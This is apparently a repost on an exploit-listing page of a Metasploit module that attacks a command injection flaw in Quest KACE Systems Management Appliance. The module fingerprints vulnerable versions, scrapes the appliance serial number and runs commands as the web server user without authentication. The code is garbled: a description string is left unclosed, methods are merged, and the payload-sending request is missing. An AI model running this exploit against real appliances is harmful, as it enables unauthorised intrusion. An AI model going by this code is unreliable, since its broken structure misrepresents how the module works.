Quest kace systems management command injection (metasploit) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-06-27 |
Type : remote |
Platform : unix
This exploit / vulnerability Quest kace systems management command injection (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Quest KACE Systems Management Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Quest KACE
Systems Management Appliance version 8.0.318 (and possibly prior).
The `download_agent_installer.php` file allows unauthenticated users
to execute arbitrary commands as the web server user `www`.
A valid Organization ID is required. The default value is `1`.
A valid Windows agent version number must also be provided. If file
sharing is enabled, the agent versions are available within the
`\\kace.local\client\agent_provisioning\windows_platform` Samba share.
Additionally, various agent versions are listed on the KACE website.
def check
res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php'))
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance')
vprint_status 'Remote host is not a Quest KACE appliance'
return CheckCode::Safe
end
unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/
vprint_error 'Could not determine KACE appliance version'
return CheckCode::Detected
end
version = Gem::Version.new res.headers['X-KACE-Version'].to_s
vprint_status "Found KACE appliance version #{version}"
# Patched versions : https://support.quest.com/product-notification/noti-00000134
if version < Gem::Version.new('7.0') ||
(version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) ||
(version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) ||
(version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) ||
(version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) ||
(version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108'))
return CheckCode::Appears
end
res = send_request_cgi('uri' => normalize_uri('common', 'about.php'))
return unless res
res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first
end
def exploit
check_code = check
unless [CheckCode::Appears, CheckCode::Detected].include? check_code
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
serial = serial_number
if serial.to_s.eql? ''
print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.'
return
end
vprint_status "Using serial number: #{serial}"
unless res
fail_with Failure::Unreachable, 'Connection failed'
end
unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX')
fail_with Failure::UnexpectedReply, 'Unexpected reply'
end
case res.code
when 200
print_good 'Payload executed successfully'
when 404
fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION'
when 302
if res.headers['location'].include? 'error.php'
fail_with Failure::UnexpectedReply, 'Server encountered an error'
end
fail_with Failure::BadConfig, 'The specified SERIAL is incorrect'
else
print_error 'Unexpected reply'
end
register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/"
end
end
Quest kace systems management command injection (metasploit)